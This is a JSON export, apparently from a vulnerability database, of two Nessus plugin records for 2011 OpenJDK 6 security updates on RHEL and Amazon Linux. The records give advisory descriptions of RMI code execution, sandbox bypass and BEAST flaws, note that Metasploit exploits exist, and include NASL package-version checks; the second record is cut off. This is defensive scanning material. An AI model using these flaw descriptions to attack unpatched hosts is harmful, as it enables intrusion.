{"lastseen": "2018-11-13T16:50:58", "references": ["https://www.redhat.com/security/data/cve/CVE-2011-3556.html", "http://www.nessus.org/u?ca4e3a4e", "https://www.redhat.com/security/data/cve/CVE-2011-3544.html", "https://www.redhat.com/security/data/cve/CVE-2011-3521.html", "https://access.redhat.com/errata/RHSA-2011:1380", "https://www.redhat.com/security/data/cve/CVE-2011-3554.html", "https://www.redhat.com/security/data/cve/CVE-2011-3547.html", "http://www.nessus.org/u?3fed43a3", "https://www.redhat.com/security/data/cve/CVE-2011-3553.html", "https://www.redhat.com/security/data/cve/CVE-2011-3389.html", "https://www.redhat.com/security/data/cve/CVE-2011-3548.html", "https://www.redhat.com/security/data/cve/CVE-2011-3557.html", "https://www.redhat.com/security/data/cve/CVE-2011-3551.html", "https://www.redhat.com/security/data/cve/CVE-2011-3560.html", "https://www.redhat.com/security/data/cve/CVE-2011-3552.html", "https://www.redhat.com/security/data/cve/CVE-2011-3558.html"], "pluginID": "56553", "description": "Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag '-Djsse.enableCBCProtection=false' to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 9, "reporter": "Tenable", "published": "2011-10-19T00:00:00", "title": "RHEL 5 / 6 : java-1.6.0-openjdk (RHSA-2011:1380) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo", "cpe:/o:redhat:enterprise_linux:6.1", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo"], "id": "REDHAT-RHSA-2011-1380.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56553", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1380. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56553);\n script_version (\"1.29\");\n script_cvs_date(\"Date: 2018/11/10 11:49:51\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_bugtraq_id(49388, 49778, 50211, 50215, 50216, 50218, 50224, 50231, 50234, 50236, 50242, 50243, 50246, 50248);\n script_xref(name:\"RHSA\", value:\"2011:1380\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.6.0-openjdk (RHSA-2011:1380) (BEAST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol)\ndeserialization code. An untrusted Java application or applet running\nin a sandbox could use this flaw to bypass sandbox restrictions by\ndeserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict\nthe privileges of sandboxed applications. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic\nshapes and images. An untrusted Java application or applet running in\na sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR\nfiles in pack200 format. A specially crafted JAR file could use this\nflaw to crash the Java Virtual Machine (JVM) or, possibly, execute\narbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager\nchecks in the setSSLSocketFactory method. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag '-Djsse.enableCBCProtection=false'\nto the java command.\n\nAn information leak flaw was found in the InputStream.skip\nimplementation. An untrusted Java application or applet could possibly\nuse this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted\nJava application or applet could use this flaw to disclose portions of\nthe VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK\nwas configured to include the stack trace in error messages sent to\nclients. A remote client could possibly use this flaw to obtain\nsensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3389.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3521.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3544.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3548.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3551.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3552.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3553.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3554.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3556.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3557.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3560.html\"\n );\n # http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fed43a3\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea6-1.9/file/328afd896e3e/NEWS\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca4e3a4e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1380\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1380\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:47:49", "references": ["https://alas.aws.amazon.com/ALAS-2011-10.html"], "pluginID": "69569", "description": "A flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag '-Djsse.enableCBCProtection=false' to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)", "edition": 6, "reporter": "Tenable", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2011-10) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.6.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-devel", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-javadoc", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-debuginfo"], "id": "ALA_ALAS-2011-10.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69569", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-10.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69569);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_xref(name:\"ALAS\", value:\"2011-10\");\n script_xref(name:\"RHSA\", value:\"2011:1380\");\n\n script_name(english:\"Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2011-10) (BEAST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol)\ndeserialization code. An untrusted Java application or applet running\nin a sandbox could use this flaw to bypass sandbox restrictions by\ndeserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict\nthe privileges of sandboxed applications. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic\nshapes and images. An untrusted Java application or applet running in\na sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR\nfiles in pack200 format. A specially crafted JAR file could use this\nflaw to crash the Java Virtual Machine (JVM) or, possibly, execute\narbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager\nchecks in the setSSLSocketFactory method. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag '-Djsse.enableCBCProtection=false'\nto the java command.\n\nAn information leak flaw was found in the InputStream.skip\nimplementation. An untrusted Java application or applet could possibly\nuse this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted\nJava application or applet could use this flaw to disclose portions of\nthe VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK\nwas configured to include the stack trace in error messages sent to\nclients. A remote client could possibly use this flaw to obtain\nsensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-10.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update java-1.6.0-openjdk' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 